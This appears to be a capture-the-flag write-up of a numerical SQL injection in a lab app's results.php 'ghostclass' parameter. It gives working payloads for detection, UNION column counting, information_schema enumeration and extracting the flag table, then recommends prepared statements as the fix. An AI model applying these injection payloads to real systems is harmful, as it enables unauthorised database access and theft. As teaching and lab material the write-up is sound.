Vulnerability analysis
The ghostcont application suffers from a numerical SQL injection vulnerability exploitable through the hidden input "ghostclass" of the results.php page. To test the presence of the vulnerability by means of Burp Repeater we can send the following HTTP bodies to the page results.php:
searchstring=the&ghostclass=2
and:
searchstring=the&ghostclass=1%2b1
We can observe that the results are the same (except for the image at the top of the page, which depends on the "ghostclass" input without a SQL query). This confirms us that the SQL expression "1+1" gets evaluated, therefore there is a numerical SQL injection vulnerability.

Exploitation
The vulnerabiliuty is non-blind, so we can exploit it by means of the UNION operator technique. The first thing to do is to check the number of columns of the UNION operation by sending:
searchstring=the&ghostclass=1+UNION+SELECT+null+--+
searchstring=the&ghostclass=1+UNION+SELECT+null,null+--+
Etc., until it returns a page without errors. It turns out that there are two columns in the UNION operation, both of which are returned into the page. Now we have to reverse engineer the database with:
searchstring=the&ghostclass=1+UNION+SELECT+table_name,column_name+FROM+information_schema.columns+WHERE+table_schema=database()+--+
Through this we discover that there are two tables in the current schema: a "ghosts" table and a "flag" table which contains a single column named "flag".
Now we can proceed to steal the flag by injecting:
searchstring=the&ghostclass=1+UNION+SELECT+flag,null+FROM+flag+--+
The flag will appear among the results.

Remediation
We cannot patch this by using mysqli_real_escape_string() because the vulnerable input is not a string. Thus the only approach is to use prepared statements.